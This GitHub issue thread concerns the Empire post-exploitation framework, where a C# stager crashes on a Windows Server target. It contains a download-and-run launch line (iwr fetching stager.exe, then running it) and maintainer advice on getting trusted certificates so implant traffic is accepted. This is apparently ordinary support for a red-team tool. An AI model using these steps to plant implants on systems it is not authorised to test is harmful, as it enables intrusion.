[BUG] Csharp stager incorrect source code

[captain-woof]

Note: Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

Empire Version

• Empire 4.0.0+gitsubmodule-0kali2

OS Information (Linux flavor, Python version)

• OS: Kali
• Python: 3.9

Describe the bug

Executing a csharp stager on a target machine throws off this error:

System.NullReferenceException: Object reference not set to an instance of an object.
   at Sharpire.EmpireStager.Execute()
   at Program.Main()

To Reproduce

Steps to reproduce the behavior:

1. Set up listener
2. Turn on csharp compiler plugin
3. Create csharp stager
4. Execute stager on target

Expected behavior

Execution of the stager.

Screenshots

None

Additional context

None

[Hubbl3]

@captain-woof can you please expand more on the problem? I just tested with a clean install of Empire and am unable to reproduce

What is the target box you are trying to run on? How are you launching the implant? Which version of Kali are you on? Can you provide any screen shots of the error?

[captain-woof]

@Hubbl3

• Target box's systeminfo

  Hostname: REDACTED
  Domain Name: REDACTED.local
  ProductName: Windows Server 2019 Standard
  EditionID: ServerStandard
  ReleaseId: 1809
  BuildBranch: rs5_release
  CurrentMajorVersionNumber: 10
  CurrentVersion: 6.3
  Architecture: AMD64
  ProcessorCount: 4
  SystemLang: en-US
  IsVirtualMachine: True
  HighIntegrity: False
  PartOfDomain: True
  Hotfixes:

• Launching the implant iwr -uri URL -outfile stager.exe; ./stager.exe

• Version of Kali Kali 2021.2 (5.10.0-kali9-amd64)

• Demo

  https://user-images.githubusercontent.com/72122026/126266500-5c0f02fb-8f1b-42ec-a8c0-8420f4cb4f31.mp4

[Hubbl3]

@captain-woof The only time I am able to reproduce the issue is when I attempt to use https with a self signed cert. Turns otu the .webrequest call will automatically reject self-signed certs. I am working testing that. Normal http traffic returns fine. Are you able to get a powershell agent to connect?

The only other issue I can think of, is have you checked to make sure that you compiled against the proper .NET version for the target box. Can you check which versions are installed? You can use this script:

Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select PSChildName, Version, Release

thank you for providing the video it was very useful

[captain-woof]

@Hubbl3 Well, I was using self signed cert, so that may have been the issue. Also, I did check the correct .NET Framework version before compiling, so yes, that part has no problem.

If self signed certs are rejected, is there a work around?

[Hubbl3]

@captain-woof so there are suggestions for work arounds like this:

https://stackoverflow.com/questions/526711/using-a-self-signed-certificate-with-nets-httpwebrequest-response

but I haven't been able to get it to work for some reason.

Depending upon you need you can use an AWS or Azure hosted VPS with certbot to get a legitimate signed cert for free. Let's Encrypt has blacklisted AWS domains from receiving a cert so you need another domain on top. There are some sites like:

https://codotvu.co/

to get a free domain so you don't need to purchase one. I have verified that the C# agent does work when utilizing a Let's Encrypt cert

[captain-woof]

@Hubbl3 Thanks for the suggestion :) 👍